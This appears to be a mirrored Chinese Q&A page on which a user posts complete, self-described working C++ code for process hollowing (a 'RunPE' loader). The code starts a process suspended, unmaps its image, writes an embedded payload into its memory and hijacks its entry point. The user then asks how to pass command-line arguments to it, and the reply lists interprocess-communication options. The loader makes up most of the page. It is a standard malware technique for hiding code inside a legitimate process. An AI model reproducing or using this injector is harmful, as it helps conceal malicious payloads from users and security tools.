1. 首页
  2. 问答
  3. C++进程中空/动态分叉

C++进程中空/动态分叉

2013-10-03 27 views
1

我想了解整个进程如何挖空又名动态分叉 - 概念实际上是如何工作的。C++进程中空/动态分叉

我很好奇的一件事是如何将命令行参数/参数传递给分叉进程?

以下是我正在学习的代码(完全正常工作),希望我找不出解决方案如何为正在内存中执行的文件添加CMD参数。

Hollow.h

typedef LONG (WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress); 

class runPE{ 
public: 
    void run(LPSTR szFilePath, PVOID pFile) 
    { 
     PIMAGE_DOS_HEADER IDH;  
     PIMAGE_NT_HEADERS INH;  
     PIMAGE_SECTION_HEADER ISH; 
     PROCESS_INFORMATION PI;  
     STARTUPINFOA SI;   
     PCONTEXT CTX;    
     PDWORD dwImageBase;   
     NtUnmapViewOfSection xNtUnmapViewOfSection; 
     LPVOID pImageBase;   
     int Count;     
     IDH = PIMAGE_DOS_HEADER(pFile); 
     if (IDH->e_magic == IMAGE_DOS_SIGNATURE) 
     { 
      INH = PIMAGE_NT_HEADERS(DWORD(pFile) + IDH->e_lfanew); 
      if (INH->Signature == IMAGE_NT_SIGNATURE) 
      { 
       RtlZeroMemory(&SI, sizeof(SI)); 
       RtlZeroMemory(&PI, sizeof(PI)); 
       if (CreateProcessA(szFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &SI, &PI)) 
       { 
        CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE)); 
        CTX->ContextFlags = CONTEXT_FULL; 
        if (GetThreadContext(PI.hThread, LPCONTEXT(CTX))) 
        { 
         ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&dwImageBase), 4, NULL); 
         if (DWORD(dwImageBase) == INH->OptionalHeader.ImageBase) 
         { 
          xNtUnmapViewOfSection = NtUnmapViewOfSection(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection")); 
          xNtUnmapViewOfSection(PI.hProcess, PVOID(dwImageBase)); 
         } 
         pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(INH->OptionalHeader.ImageBase), INH->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE); 
         if (pImageBase) 
         { 
          WriteProcessMemory(PI.hProcess, pImageBase, pFile, INH->OptionalHeader.SizeOfHeaders, NULL); 
          for (Count = 0; Count < INH->FileHeader.NumberOfSections; Count++) 
          { 
           ISH = PIMAGE_SECTION_HEADER(DWORD(pFile) + IDH->e_lfanew + 248 + (Count * 40)); 
           WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + ISH->VirtualAddress), LPVOID(DWORD(pFile) + ISH->PointerToRawData), ISH->SizeOfRawData, NULL); 
          } 
          WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&INH->OptionalHeader.ImageBase), 4, NULL); 
          CTX->Eax = DWORD(pImageBase) + INH->OptionalHeader.AddressOfEntryPoint; 
          SetThreadContext(PI.hThread, LPCONTEXT(CTX)); 
          ResumeThread(PI.hThread); 
         } 

        } 
       } 
      } 
     } 
     VirtualFree(pFile, 0, MEM_RELEASE); 
    } 
};

主要

int main() 
{ 
    runPE rp; 
    TCHAR szFilePath[1024]; 
    GetModuleFileNameA(0, LPSTR(szFilePath), 1024); 
    rp.run(LPSTR(szFilePath), shellcode); 
    //Sleep(INFINITE); 
    return 0; 
}

但如何将参数传递到正在将分叉自身/内存的代码?如果没有解决方案,我一直在搞这个问题超过7个小时,有人请给我指出正确的方式或告诉我它是如何完成的。

来源

2013-10-03 user2404495

回答

0

您可以随时使用某种interpocess通信:

  1. 制造假窗口并使用窗口消息
  3. 邮筒
  4. 插座
  5. 文件
  6. 共享内存

来源

2013-10-03 19:31:27

+0

你能告诉我一个例子吗? – user2404495

相关问题

 相关问题